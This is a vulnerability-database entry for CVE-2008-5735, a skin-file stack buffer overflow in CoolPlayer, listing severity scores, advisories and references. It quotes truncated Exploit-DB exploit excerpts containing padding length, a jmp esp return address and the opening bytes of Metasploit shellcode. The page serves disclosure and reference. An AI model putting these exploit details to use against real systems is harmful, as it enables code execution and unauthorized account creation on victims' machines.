CVE-2008-5735
published 2008-12-26CVE-2008-5735: Stack-based buffer overflow in skin.c in CoolPlayer 2.17 through 2.19 allows remote attackers to execute arbitrary code via a large PlaylistSkin value in a…
PriorityP350critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.39%
93.7th percentile
Stack-based buffer overflow in skin.c in CoolPlayer 2.17 through 2.19 allows remote attackers to execute arbitrary code via a large PlaylistSkin value in a skin file.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coolplayer | coolplayer | — | — |
| coolplayer | coolplayer | — | — |
| coolplayer | coolplayer | — | — |
| coolplayer | coolplayer | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rqm3-w6pg-frpw: Stack-based buffer overflow in skin
ghsa_unreviewed·2022-05-14
CVE-2008-5735 [HIGH] CWE-119 GHSA-rqm3-w6pg-frpw: Stack-based buffer overflow in skin
Stack-based buffer overflow in skin.c in CoolPlayer 2.17 through 2.19 allows remote attackers to execute arbitrary code via a large PlaylistSkin value in a skin file.
GHSA
GHSA-mxhx-hq56-f376: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2
ghsa_unreviewed·2022-05-02·CVSS 9.3
CVE-2009-1449 [CRITICAL] CWE-119 GHSA-mxhx-hq56-f376: Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2
Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.1 allows remote attackers to execute arbitrary code via a skin file (skin.ini) with a large PlaylistSkin parameter. NOTE: this may overlap CVE-2008-5735.
No detection rules found.
Exploit-DB
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
exploitdb·2008-12-22
CVE-2008-5735 CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
---
# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected :)
# By:Encrypt3d.M!nd
#
# Orginal Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# i've test it on my box(winxp sp3) and didn't work
# so i've re-wrote the exploit and this is workin
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################
chars = "A"*1511
eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489
Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x
Exploit-DB
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
exploitdb·2008-12-21
CVE-2008-5735 CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
---
/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/
#include
#include
#include //exit
using namespace std;
int main()
{
//win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
//Bad characters: 0x00, 0x0d, 0xf4
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x
No writeups or analysis indexed.
http://securityreason.com/securityalert/4813http://www.bmgsec.com.au/advisory/43/http://www.securityfocus.com/archive/1/499480/100/0/threadedhttp://www.securityfocus.com/bid/32947https://exchange.xforce.ibmcloud.com/vulnerabilities/47527https://www.exploit-db.com/exploits/7536https://www.exploit-db.com/exploits/7547http://securityreason.com/securityalert/4813http://www.bmgsec.com.au/advisory/43/http://www.securityfocus.com/archive/1/499480/100/0/threadedhttp://www.securityfocus.com/bid/32947https://exchange.xforce.ibmcloud.com/vulnerabilities/47527https://www.exploit-db.com/exploits/7536https://www.exploit-db.com/exploits/7547
2008-12-26
Published